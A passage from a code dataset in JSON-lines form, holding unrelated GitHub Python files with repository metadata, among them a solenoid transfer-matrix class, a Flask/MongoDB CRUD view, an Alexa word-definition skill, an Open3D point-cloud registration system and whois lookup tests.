Element\n\n\nclass SolenoidAtom(Element):\n \"\"\"\n Solenoid\n l - length in m,\n k - strength B0/(2B*rho)\n \"\"\"\n\n def __init__(self, l=0., k=0., eid=None):\n Element.__init__(self, eid)\n self.k = k # B0/(2B*rho)\n self.l = l\n\n def __str__(self):\n s = 'Solenoid('\n s += 'l=%7.5f, ' % self.l if self.l != 0. else \"\"\n s += 'k=%8.6e, ' % self.k if np.abs(self.k) > 1e-15 else \"\"\n s += 'eid=\"' + str(self.id) + '\")' if self.id is not None else \")\"\n return s\n\n def create_first_order_main_params(self, energy: float, delta_length: float = None) -> FirstOrderParams:\n R = self.R_main_matrix(energy=energy, length=delta_length if delta_length != None else self.l)\n B = self._default_B(R)\n return FirstOrderParams(R, B, self.tilt)\n\n def R_main_matrix(self, energy, length):\n\n def sol(l, k, energy):\n \"\"\"\n K.Brown, A.Chao.\n :param l: effective length of solenoid\n :param k: B0/(2*Brho), B0 is field inside the solenoid, Brho is momentum of central trajectory\n :return: matrix\n \"\"\"\n gamma = energy / m_e_GeV\n c = np.cos(l * k)\n s = np.sin(l * k)\n if k == 0:\n s_k = l\n else:\n s_k = s / k\n r56 = 0.\n if gamma != 0:\n gamma2 = gamma * gamma\n beta = np.sqrt(1. - 1. / gamma2)\n r56 -= l / (beta * beta * gamma2)\n sol_matrix = np.array([[c * c, c * s_k, s * c, s * s_k, 0., 0.],\n [-k * s * c, c * c, -k * s * s, s * c, 0., 0.],\n [-s * c, -s * s_k, c * c, c * s_k, 0., 0.],\n [k * s * s, -s * c, -k * s * c, c * c, 0., 0.],\n [0., 0., 0., 0., 1., r56],\n [0., 0., 0., 0., 0., 1.]]).real\n return sol_matrix\n\n return sol(length, k=self.k, energy=energy)\n","repo_name":"ocelot-collab/ocelot","sub_path":"ocelot/cpbd/elements/solenoid_atom.py","file_name":"solenoid_atom.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"53"} +{"seq_id":"40374418516","text":"from flask import render_template,Blueprint,redirect, request, render_template\r\nimport pymongo\r\n\r\nupdatee=Blueprint('update',__name__)\r\n\r\nmyclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\r\nmydb = myclient[\"Day2\"]\r\ntrainers=mydb.Trainers.find({})\r\nmycol = mydb[\"Trainers\"]\r\ndef next_id():\r\n x = mydb.Trainers.find({}).sort(\"_id\", -1).limit(1)\r\n id = 0\r\n for i in x:\r\n id = i['_id']\r\n return id+1 if x!=0 else redirect('/home')\r\n\r\n\r\n@updatee.route('/update/',methods=[\"POST\",\"GET\"])\r\ndef update(id):\r\n mycol = mydb[\"Trainers\"]\r\n if request.method == 'POST':\r\n\r\n uname = request.form.get('Username')\r\n uage = request.form.get('National')\r\n course = request.form.get('Course')\r\n mycol.update_one({\"_id\":id},{\"$set\": {\"Username\": uname, \"National\": uage, \"Course\": course}})\r\n\r\n return redirect('/home')\r\n else:\r\n\r\n trainers =list( mydb.Trainers.find({'_id':id}))\r\n return render_template('traine/update.html', tr=trainers)\r\n","repo_name":"MahmoudShawke/FLASK-CRUD-SYTEM","sub_path":"views/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9393384549","text":"#coding=utf-8\n\nimport unittest\nimport time\nfrom selenium import webdriver\nfrom page.loginf_page import LoginPage\nfrom page.auditing_coupon_page import AuditingCouponPage\nfrom common.logger import logger as log\n\nclass TestAuditingCoupon(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.driver=webdriver.Firefox()\n cls.loginf_page=LoginPage(cls.driver)\n cls.auditing_coupon_page=AuditingCouponPage(cls.driver)\n\n def test_auditing_coupon(self):\n #登录\n self.loginf_page.login()\n time.sleep(10)\n #获取实际结果\n re=self.auditing_coupon_page.main()\n #期望结果\n log.info(\"re\")\n\n def tearDown(self):\n self.driver.close()\n\nif __name__==\"__main__\":\n unittest.main()\n\n","repo_name":"loveyshelly/yy","sub_path":"case/test_auditing_coupon.py","file_name":"test_auditing_coupon.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32335931862","text":"arr = []\r\n\r\nwhile 1:\r\n try:\r\n val = list(input().split())\r\n val[1] = int(val[1])\r\n arr.append(val)\r\n except EOFError:\r\n break\r\n\r\narr.sort(key=lambda x: x[1])\r\nprint(arr[0][0])\r\n\r\n","repo_name":"KHyeon9/Algorithm_Python","sub_path":"BOJ/Bronze/6830.py","file_name":"6830.py","file_ext":"py","file_size_in_byte":213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27966373876","text":"import sys\n\ninputing = lambda : sys.stdin.readline().rstrip()\nwow = lambda : map(int,inputing().split())\none = lambda : int(inputing())\n\n# r,l = wow()\n# garo_dict = {} # 정면\n# sero_dict = {} # 측면\n# for sero in range(r):\n# a = list(wow())\n# for garo in range(l):\n# if garo not in garo_dict:\n# garo_dict[garo]=[a[garo]]\n# else:\n# garo_dict[garo]+=[a[garo]] \n# sero_dict[sero]=a\n# sero_max = {} #측면 최댓값\n# for i in range(r):\n# index = sero_dict[i].index(max(sero_dict[i]))\n# if index not in sero_max:\n# sero_max[index]=[max(sero_dict[i])]\n# else:\n# sero_max[index]+=[max(sero_dict[i])]\n# # print(sero_max)\n# cnt = 0\n# for garo in range(l):\n# # print(garo_dict[garo])\n# pass_list = [max(garo_dict[garo])]\n# if garo in sero_max:\n# pass_list+=sero_max[garo]\n# cnt+=sum(garo_dict[garo])-sum(list(set(pass_list)))\n# print(cnt)\n\nfor _ in range(one()):\n a = one()\n a_str = list(str(a))\n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"WinterWhiteSnow/Python-Baekjoon","sub_path":"2022/5월/22.py","file_name":"22.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72197229609","text":"def submit_pyspark_job(dataproc, project, region,\n cluster_name, bucket_name, filename):\n \"\"\"Submits the Pyspark job to the cluster, assuming `filename` has\n already been uploaded to `bucket_name`\"\"\"\n job_details = {\n 'projectId': project,\n 'job': {\n 'placement': {\n 'clusterName': cluster_name\n },\n 'pysparkJob': {\n 'mainPythonFileUri': 'gs://{}/{}'.format(bucket_name, filename)\n }\n }\n }\n result = dataproc.projects().regions().jobs().submit(\n projectId=project,\n region=region,\n body=job_details).execute()\n job_id = result['reference']['jobId']\n print('Submitted job ID {}'.format(job_id))\n return job_id\n","repo_name":"expz/past2present","sub_path":"dataproc/submit_job_to_cluster.py","file_name":"submit_job_to_cluster.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"25727435659","text":"# -*- coding: UTF-8 -*-\n\nimport pandas as pd\nimport xlrd\nimport pyecharts.options as opts\nfrom pyecharts.charts import Timeline, Bar\nimport matplotlib.pyplot as plt\n\nfrom pyecharts.globals import CurrentConfig\n\n\nCurrentConfig.ONLINE_HOST = \"C:\\\\Users\\\\Lenovo\\\\Desktop\\\\learn_pytorch\\\\kang_homework\\\\pyecharts-assets-master\\\\pyecharts-assets-master\\\\assets\"\n# CurrentConfig.ONLINE_HOST = 'D:/python/pyecharts-assets-master/assets/'\n\n# 提取编程语言名字\nname = list(pd.read_excel('language_data.xlsx')['Programing'].drop_duplicates())#['Programing'].drop_duplicates()\nprint(name)\ndata = xlrd.open_workbook('language_data.xlsx')\n\ntable = data.sheets()[0]\nprint(table.nrows)\ndic1 = {k: [] for k in name}\n# 各编程语言对应每年里不同时间的热度\nfor i in range(1, table.nrows):\n x = table.row_values(i)\n dic1[x[0]].append((x[1], x[2]))\n\n\n\n# for k, v in dic1.items():#k是语言,v是年份和数据\n# print(k)\n# print(v)\n #for j in v: # v (时间,热度) 热度数据添加进各年对应的列表里\n #print(j[1])\n\n\n# 与编程语言顺序对应 每年编程语言对应的不同时间的热度\ndata_per = {k: [[] for x in range(10)] for k in range(2001, 2023)}\n\n\ncount = 0\nfor k, v in dic1.items():\n for j in v: # v (时间,热度) 热度数据添加进各年对应的列表里\n\n data_per[int(j[0][:4])][count].append(eval(j[1])) # 一年里各编程语言不同时间时的热度 对应起来\n count += 1\nprint(data_per)\n\ndata_per1 = {k: [] for k in list(data_per.keys())}\n\nfor k, v in list(data_per.items()):\n for x in v:\n if len(x) == 0: # 这一年里该语言没有热度数据\n data_per1[k].append(0)\n else:\n avg = sum(x) / len(x)\n data_per1[k].append(avg) # 这一年里的平均热度\n\n# 得到TOBIE现在排Top20的编程语言从2001年���始每年的平均热度\nprint(data_per1)\n\n\ndef get_year_overlap_chart(year) -> Bar:\n sum_info = [(m, n) for m, n in zip(name, data_per1[year])]\n # 编程语言按每年平均热度排序\n sum_info.sort(key=lambda z: z[1], reverse=True)\n name_ = [m[0] for m in sum_info]\n datas = [m[1] for m in sum_info]\n\n #print(sum_info)\n # 每根柱子的颜色列表\n colors = ['#00BFFF', '#0000CD', '#000000', '#008000', '#FF1493', '#FFD700', '#FF4500', '#00FA9A', '#191970',\n '#9932CC']\n color = ['#F0F8FF', '#FAEBD7', '#00FFFF', '#7FFFD4', '#F0FFFF', '#F5F5DC', '#FFE4C4', '#000000', '#FFEBCD',\n '#0000FF']\n x = []\n\n # 绘制柱形图\n\n plt.figure(figsize=(24, 8))\n plt.xlabel('language', fontsize=20)\n plt.ylabel('{:}year'.format(year), fontsize=20)\n plt.bar(name_,datas,width=0.3,color=['#00BFFF', '#0000CD', '#000000', '#008000', '#FF1493', '#FFD700', '#FF4500', '#00FA9A', '#191970',\n '#9932CC'])\n plt.show()\n\n\n# for y in range(2010,2021):\n# get_year_overlap_chart(y)\n# 生成时间轴的图\n# timeline = Timeline(init_opts=opts.InitOpts(width=\"1200px\", height=\"600px\"))\n# for y in range(2009, 2020):\n# timeline.add(get_year_overlap_chart(y), time_point=str(y))\n#\n# timeline.add_schema(is_auto_play=True, play_interval=1000)\n# timeline.render(\"language_2009_2019(1).html\")\n","repo_name":"ShitK/2022project","sub_path":"work_2.py","file_name":"work_2.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24707532923","text":"\"\"\"\nThis sample demonstrates a simple skill built with the Amazon Alexa Skills Kit.\nThe Intent Schema, Custom Slots, and Sample Utterances for this skill, as well\nas testing instructions are located at http://amzn.to/1LzFrj6\nFor additional samples, visit the Alexa Skills Kit Getting Started guide at\nhttp://amzn.to/1LGWsLG\n\"\"\"\n\nfrom __future__ import print_function\nimport urllib, json, time, urllib2\nimport bs4\nimport requests\n\n# --------------- Helpers that build all of the responses ----------------------\n\ndef build_speechlet_response(title, output, reprompt_text, should_end_session):\n return {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': output\n },\n 'reprompt': {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': reprompt_text\n }\n },\n 'shouldEndSession': should_end_session\n }\n\n\ndef build_response(session_attributes, speechlet_response):\n return {\n 'version': '1.0',\n 'sessionAttributes': session_attributes,\n 'response': speechlet_response\n }\n\n\n# --------------- Functions that control the skill's behavior ------------------\n\ndef get_welcome_response():\n \"\"\" If we wanted to initialize the session to have some attributes we could\n add those here\n \"\"\"\n\n session_attributes = {}\n card_title = \"Welcome\"\n speech_output = \"Welcome to the Define Word. \" \\\n \"Please ask me questions like Tell me the meaning of Love.\"\n # If the user either does not reply to the welcome message or says something\n # that is not understood, they will be prompted again with this text.\n reprompt_text = \"Please tell me word for which you want the meaning.\"\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\ndef getHelpMessage():\n session_attributes = {}\n card_title = \"Help Content\"\n speech_output = \"You can ask me questions like Tell me the meaning of Love.\"\n # If the user either does not reply to the welcome message or says something\n # that is not understood, they will be prompted again with this text.\n reprompt_text = \"Please ask me questions like Tell me the meaning of Love.\"\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef getErrorMessage():\n session_attributes = {}\n card_title = \"Help Content\"\n speech_output = \"If you just said something then I can't understand it. \" \\\n \"Please ask me questions like Tell me the meaning of Love.\"\n # If the user either does not reply to the welcome message or says something\n # that is not understood, they will be prompted again with this text.\n reprompt_text = \"Please ask me questions like Tell me the meaning of Love.\"\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\ndef handle_session_end_request():\n card_title = \"Session Ended\"\n speech_output = \"Thank you for trying Define Word. \" \\\n \"Have a nice day! \"\n # Setting this to true ends the session and exits the skill.\n should_end_session = True\n return build_response({}, build_speechlet_response(\n card_title, speech_output, None, should_end_session))\n\ndef getMeaning(intent, session):\n \"\"\" Get the word meaning and prepares the speech to reply to the user.\n \"\"\"\n card_title = \"Define Word\"\n session_attributes = {}\n should_end_session = True\n speech_output = \"Sorry, Meaning not found for the given word.\"\n if 'Word' in intent['slots']:\n word = intent['slots']['Word']\n if 'value' in word:\n word = word['value']\n if word == \"\":\n return getErrorMessage()\n else:\n url = 'https://www.google.co.in/search?q=define%20' + word + '#cns=1'\n headers = {\"user-agent\": \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36\"}\n response = requests.get(url, headers=headers)\n html = response.content\n final_soup = bs4.BeautifulSoup(html, \"html5lib\")\n everyThing = final_soup.select(\"div._Jig\")\n if len(everyThing) > 0:\n speech_output = \"The meaning of \" + word + \" is \" + everyThing[0].text.split('.')[0]\n else:\n return getErrorMessage()\n else:\n return getErrorMessage()\n reprompt_text = \"Please ask me questions like Tell me the meaning of Love.\"\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n# --------------- Events ------------------\n\ndef on_session_started(session_started_request, session):\n \"\"\" Called when the session starts \"\"\"\n\n print(\"on_session_started requestId=\" + session_started_request['requestId']\n + \", sessionId=\" + session['sessionId'])\n\n\ndef on_launch(launch_request, session):\n \"\"\" Called when the user launches the skill without specifying what they\n want\n \"\"\"\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()\n\n\ndef on_intent(intent_request, session):\n \"\"\" Called when the user specifies an intent for this skill \"\"\"\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"DefineWordIntent\":\n return getMeaning(intent, session)\n elif intent_name == \"AMAZON.HelpIntent\":\n return getHelpMessage()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n raise ValueError(\"Invalid intent\")\n\n\ndef on_session_ended(session_ended_request, session):\n \"\"\" Called when the user ends the session.\n Is not called when the skill returns should_end_session=true\n \"\"\"\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here\n\n\n# --------------- Main handler ------------------\n\ndef lambda_handler(event, context):\n \"\"\" Route the incoming request based on type (LaunchRequest, IntentRequest,\n etc.) The JSON body of the request is provided in the event parameter.\n \"\"\"\n print(\"event.session.application.applicationId=\" +\n event['session']['application']['applicationId'])\n\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n # if (event['session']['application']['applicationId'] !=\n # \"amzn1.echo-sdk-ams.app.[unique-value-here]\"):\n # raise ValueError(\"Invalid Application ID\")\n\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n\n if event['request']['type'] == \"LaunchRequest\":\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == \"IntentRequest\":\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == \"SessionEndedRequest\":\n return on_session_ended(event['request'], event['session'])","repo_name":"manishbisht/Define-Word","sub_path":"deployment_package/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":7815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28169581751","text":"class Cliente:\r\n \r\n def __init__(self):\r\n #interes 1 de acuerdo con estudio, interes 0 no desea estudio\r\n #historia 1 cuenta con calificación, historia 0 no cuenta con calificación\r\n self.Edad = int(input('Ingrese su edad '))\r\n self.Interesestudio = int(input('Ingrese 1 si desea el estudio, de lo contrario ingrese 0: ')) # conocer o aplicar credito\r\n self.Histocredito = int(input('Ingrese 1 si cuenta con calificación, de lo contrario ingrese 0: '))\r\n \r\n\r\n def ingreso (self):\r\n if self.Interesestudio == 0:\r\n Cliente.egresos # aplicar cliente.estudio de paso 2\r\n else:\r\n print(\"puedes recorrer la plataforma\") # Conocer\r\n\r\n \r\n def calificacioninicial (self):\r\n if self.Histocredito == 1:\r\n self.Calestudio = int(input(\"Por favor ingrese su calificación numérica: \"))\r\n #Cliente.analisis interpretación de resultados paso 4\r\n if self.Calestudio>= 700:\r\n print(\"Manejo correcto\\n\")\r\n elif (self.Calestudio>=400 and self.Calestudio <=699):\r\n print(\"Manejo Aceptable\\n\")\r\n elif self.Calestudio<400:\r\n print(\"Manejo Crítico\\n\") \r\n elif Cliente.egresos: \r\n pass # aplicar cliente.estudio de paso 2\r\n else: \r\n print(\"Ingrese una calificación válida\") \r\n\r\n\r\nclass Egresos():\r\n def __init__(self):\r\n self.consolidadogasto = []\r\n\r\n def tablagasto(self):\r\n self.secuenciagasto = input(\"Por favor ingrese un número a su gasto: \")\r\n self.nomgasto = input(\"Por favor ingrese el nombre del gasto: \")\r\n self.nomfrecuencia = input(\"Por favor ingrese frecuencia\\n 1 mensual\\n 2 quincenal\\n 4 semanal\\n y 30 diario\\n \")\r\n self.nomvalor = input(\"Por favor ingrese el valor del gasto: \")\r\n nuevogasto = (self.nomgasto, self.nomfrecuencia, self.nomvalor)\r\n self.consolidadogasto.append(nuevogasto) # Pendiente que acumule gastos en la misma tabla\r\n print(\"Nuevo gasto incluido\")\r\n print( self.consolidadogasto)\r\n \r\n \r\n \r\n\r\n\r\n# cliente1= Cliente()\r\n# cliente1.calificacioninicial()\r\negreso1= Egresos()\r\negreso1.tablagasto()\r\n","repo_name":"sansoris/Hackaton","sub_path":"ClasePersona.py","file_name":"ClasePersona.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8820374127","text":"import sys\nimport numpy as np\nfrom funciones import *\n\n#%%\n\ndef PrimesLessThan(n):\n Papuchis = np.arange(2,n)\n Primates = []\n for num in Papuchis:\n if IsPrime(num):\n Primates.append(num)\n return Primates\n\n#%%\n\nprint (PrimesLessThan(int(sys.argv[1])))\n","repo_name":"juanitopereza/Basics","sub_path":"PrimesLessThan.py","file_name":"PrimesLessThan.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11655155268","text":"import functools\n\nimport open3d as o3d\nimport palettable\nimport numpy as np\nfrom tqdm import tqdm\nimport copy\n\n\nclass ReconstructionSystem():\n p = {\n \"voxelSize\": 0.018,\n \"radiusFeature\": 5., # radiusFeature*voxelSize\n \"radiusNormal\": 2., # radiusFeature*voxelSize\n \"FPFHdistanceThreshold\": 1.5,\n \"ICPdistanceThreshold\": 0.8,\n \"useICP\": True, # 是否使用ICP精配准\n \"useRANSC\": False, # 是否使用RANSC粗配准,如果是FALSE,使用fast配准 ,\n }\n\n def __init__(self):\n self.origionData = []\n self.trans = []\n self.colors = [[l[0] / 255, l[1] / 255, l[2] / 255] for l in palettable.mycarta.get_map(\"CubeYF_20\").colors]\n\n def _preprocessData(self, cloud: o3d.geometry.PointCloud) -> (\n o3d.geometry.PointCloud, o3d.pipelines.registration.Feature):\n pcdDown = cloud.voxel_down_sample(self.p['voxelSize'])\n rediusFeature = self.p['voxelSize'] * self.p['radiusFeature']\n rediusNormal = self.p['voxelSize'] * self.p['radiusNormal']\n pcdDown.estimate_normals(\n o3d.geometry.KDTreeSearchParamHybrid(radius=rediusNormal, max_nn=30)\n )\n pcdFpfh = o3d.pipelines.registration.compute_fpfh_feature(\n pcdDown,\n o3d.geometry.KDTreeSearchParamHybrid(radius=rediusFeature, max_nn=100)\n )\n return pcdDown, pcdFpfh\n\n def _registerPairCloud(self, source: o3d.geometry.PointCloud, target: o3d.geometry.PointCloud):\n sourceDown, sourceFpfh = self._preprocessData(source)\n targetDown, targetFpfh = self._preprocessData(target)\n distanceThreshold = self.p['voxelSize'] * self.p['FPFHdistanceThreshold']\n if self.p[\"useRANSC\"]:\n result = o3d.pipelines.registration.registration_ransac_based_on_feature_matching(\n sourceDown, targetDown, sourceFpfh, targetFpfh, False,\n distanceThreshold,\n o3d.pipelines.registration.TransformationEstimationPointToPoint(False),\n 6,\n [\n o3d.pipelines.registration.CorrespondenceCheckerBasedOnEdgeLength(0.9),\n o3d.pipelines.registration.CorrespondenceCheckerBasedOnDistance(distanceThreshold),\n ],\n o3d.pipelines.registration.RANSACConvergenceCriteria(400000, 1000)\n )\n else:\n result = o3d.pipelines.registration.registration_fast_based_on_feature_matching(\n sourceDown, targetDown, sourceFpfh, targetFpfh,\n o3d.pipelines.registration.FastGlobalRegistrationOption(\n maximum_correspondence_distance=distanceThreshold,\n # iteration_number=2000\n )\n )\n if self.p[\"useICP\"]:\n distance_threshold = self.p['voxelSize'] * self.p['ICPdistanceThreshold']\n result = o3d.pipelines.registration.registration_icp(\n source, target, distance_threshold, result.transformation,\n o3d.pipelines.registration.TransformationEstimationPointToPoint(),\n o3d.pipelines.registration.ICPConvergenceCriteria(\n relative_fitness=1e-5\n )\n )\n assert isinstance(result, o3d.pipelines.registration.RegistrationResult)\n else:\n pass\n return result\n\n def setInputClouds(self, path_list: [str, ...]):\n tqdmbar = tqdm(path_list)\n for path in tqdmbar:\n d = o3d.io.read_point_cloud(path)\n assert isinstance(d, o3d.geometry.PointCloud)\n if d.points.__len__() >= 1000:\n\n # tqdmbar.write(f\"{path} Load successful;PointCloudSize:{d.points.__len__()}\")\n # cl, ind = d.remove_statistical_outlier(\n # nb_neighbors=200, std_ratio=2 * self.p['voxelSize']\n # )\n # d = d.select_by_index(ind)\n # tqdmbar.write(f\"{path} remove_statistical_outlier;PointCloudSize:{d.points.__len__()}\")\n\n xyz = np.asarray(d.points)\n xyz = xyz - np.mean(xyz, axis=0)\n d = o3d.geometry.PointCloud()\n d.points = o3d.utility.Vector3dVector(xyz)\n\n self.origionData.append(d)\n else:\n tqdmbar.write(f\"{path} Bad data; PointCloudSize{d.points.__len__()}\")\n for i in range(len(self.origionData)):\n self.origionData[i].paint_uniform_color(self.colors[(i * 1) % len(self.colors)])\n pass\n\n def showResult(self):\n # o3d.visualization.draw_geometries(self.origionData)\n tempData = copy.deepcopy(self.origionData)\n tempData = [cloud.voxel_down_sample(self.p['voxelSize']) for cloud in tempData]\n for i in tqdm(range(self.origionData.__len__())):\n if i == 0:\n continue\n for j in range(i):\n tempData[i].transform(self.trans[j + 1])\n targetData = functools.reduce(lambda x, y: x + y, tempData)\n assert isinstance(targetData, o3d.geometry.PointCloud)\n o3d.visualization.draw_geometries([targetData.voxel_down_sample(self.p['voxelSize'])])\n pass\n\n def getResult(self):\n pass\n\n def compute(self):\n tqdmbar = tqdm(range(len(self.origionData)))\n for i in tqdmbar:\n if i == 0:\n self.trans.append(np.identity(4))\n continue\n reg = self._registerPairCloud(self.origionData[i], self.origionData[i - 1])\n self.trans.append(reg.transformation)\n tqdm.write(f\"Fitness:{reg.fitness},rmse:{reg.inlier_rmse},nums of pairs:{reg.correspondence_set.__len__()}\")\n pass\n\n def compute2(self, K=20):\n tqdmbar = tqdm(range(len(self.origionData) // K))\n tempCloudList = []\n for i in tqdmbar:\n tempCloud = o3d.geometry.PointCloud()\n for k in range(K):\n if k == 0:\n tempCloud += self.origionData[i * K + k]\n continue\n reg = self._registerPairCloud(self.origionData[i * K + k], tempCloud)\n tempCloud += self.origionData[i * K + k].transform(reg.transformation)\n tempCloud = tempCloud.voxel_down_sample(self.p['voxelSize'])\n tempCloudList.append(tempCloud)\n o3d.io.write_point_cloud(f\"id = {i}.pcd\", tempCloud)\n ansCloud = o3d.geometry.PointCloud()\n for index, cloud in enumerate(tempCloudList):\n if index == 0:\n ansCloud += cloud\n continue\n reg = self._registerPairCloud(cloud, ansCloud)\n ansCloud += cloud.transform(reg.transformation)\n ansCloud = ansCloud.voxel_down_sample(voxel_size=self.p['voxelSize'])\n\n return ansCloud\n\n def compute3(self):\n targetDataList = copy.deepcopy(self.origionData)\n for i in tqdm(range(len(targetDataList))):\n if i == 0:\n continue\n reg = self._registerPairCloud(targetDataList[i], self.origionData[i - 1])\n for k in range(i, len(targetDataList)):\n targetDataList[k] = targetDataList[k].transform(reg.transformation)\n targetCloud = o3d.geometry.PointCloud()\n for cloud in targetDataList:\n targetCloud += cloud\n return targetCloud.voxel_down_sample(self.p['voxelSize'])\n\n def compute4(self):\n targetCloud = o3d.geometry.PointCloud()\n for index in range(len(self.origionData)):\n if index == 0:\n targetCloud += self.origionData[index]\n continue\n reg = self._registerPairCloud(source=self.origionData[index],\n target=targetCloud)\n targetCloud += self.origionData[index].transform(reg.transformation)\n targetCloud = targetCloud.voxel_down_sample(self.p['voxelSize'])\n o3d.io.write_point_cloud(f'index={index}.pcd', targetCloud)\n print(f\"Index = {index}\\t,Fitness = {reg.fitness}\")\n return targetCloud\n\n\n\"\"\"\n第二个数据集Voxel 取0.05比较好\n\n\"\"\"\n","repo_name":"he20010515/open3d_Reconstruction","sub_path":"src/ReconstructionSystem.py","file_name":"ReconstructionSystem.py","file_ext":"py","file_size_in_byte":8163,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"74375845608","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\nfrom nose.tools import *\nfrom nose.plugins.skip import SkipTest\nfrom ip2org import whois, ip2org\n\n\n@raises(ValueError)\ndef test_no_domains():\n # This should raise ValueError because\n # ip2org doesn't support domain search.\n whois(\"google.com\")\n\n\n@raises(ValueError)\ndef test_invalid_ip():\n # This also should raise ValueError because the given\n # IP address is invalid.\n ips = [\"256.0.0.0\", \"0.256.0.0\", \"0.0.256.0\", \"0.0.0.256\"]\n whois(*ips)\n\n\n@raises(ValueError)\ndef test_range():\n # ip range with /XX is not desired.\n ip = \"192.168.100.0/24\"\n whois(ip)\n\n\ndef test_empty():\n result = whois()\n assert_equal(len(result), 0, \"The length of reuslt should be 0\")\n\n\ndef test_google():\n # Google IP Addresses are managed by arin.\n ip = [\n \"173.194.38.0\", \"173.194.38.1\", \"173.194.38.2\", \"173.194.38.3\",\n \"173.194.38.4\", \"173.194.38.5\", \"173.194.38.6\", \"173.194.38.7\",\n \"173.194.38.8\", \"173.194.38.9\", \"173.194.38.14\"\n ]\n\n result = whois(*ip)\n assert_equal(len(result), len(ip),\n \"The number of the result should be the same of the # of ips.\"\n )\n\n orgnames = list(map(lambda e: e.get(e[\"org_key\"]), result))\n origin_list = list(map(lambda e: e.get(\"whois\"), result))\n for name in orgnames:\n assert_equal(name, \"Google Inc. (GOGL)\",\n \"name should be Google Inc. (GOGL).\")\n for origin in origin_list:\n assert_equal(origin, \"arin\", \"origin should be arin\")\n\n\ndef test_apnic():\n apnic = [\"27.114.150.10\", \"27.114.150.11\", \"27.114.150.12\"]\n result = whois(*apnic)\n from pprint import pprint\n pprint(result)\n assert_equal(len(result), len(apnic),\n \"The number of result should be the same of the # of asia.\"\n )\n\n origin_list = list(map(lambda e: e.get(\"whois\"), result))\n orgnames = list(map(lambda e: e.get(e[\"org_key\"]), result))\n for origin in origin_list:\n assert_equal(origin, \"apnic\", \"origin should be apnic\")\n\n for name in orgnames:\n assert_equal(name,\n \"Dhivehi Raajjeyge Gulhun (PRIVATE LIMITED)\",\n (\"name should be\"\n \"Dhivehi Raajjeyge Gulhun (PRIVATE LIMITED)\"))\n\n\ndef test_afrinic():\n afrinic = [\"146.231.129.86\", \"41.248.247.207\",\n \"146.231.129.81\", \"197.80.150.123\"]\n organizations = [\n \"Rhodes University\", None, \"Rhodes University\",\n \"MWEB CONNECT (PROPRIETARY) LIMITED\"\n ]\n result = whois(*afrinic)\n origin_list = list(map(lambda e: e.get(\"whois\"), result))\n orgnames = list(map(lambda e: e.get(e[\"org_key\"]), result))\n for origin in origin_list:\n assert_equal(origin, \"afrinic\", \"origin should be afrinic\")\n\n assert_list_equal(orgnames, organizations)\n\n\ndef test_lacnic():\n lanic = [\n \"200.89.75.197\", \"200.89.75.198\",\n \"190.15.141.64\", \"200.1.19.4\"\n ]\n organizations = [\n \"Universidad de Chile\",\n \"Universidad de Chile\",\n \"CEDIA\",\n \"Universidad Tecnica Federico Santa Maria\"\n ]\n result = whois(*lanic)\n origin = set(list(map(lambda el: el.get(\"whois\"), result)))\n assert_equal(len(origin), 1)\n assert_list_equal(list(origin), [\"lancic\"])\n orgnames = list(map(lambda e: e.get(e[\"org_key\"]), result))\n assert_list_equal(orgnames, organizations)\n\n\ndef 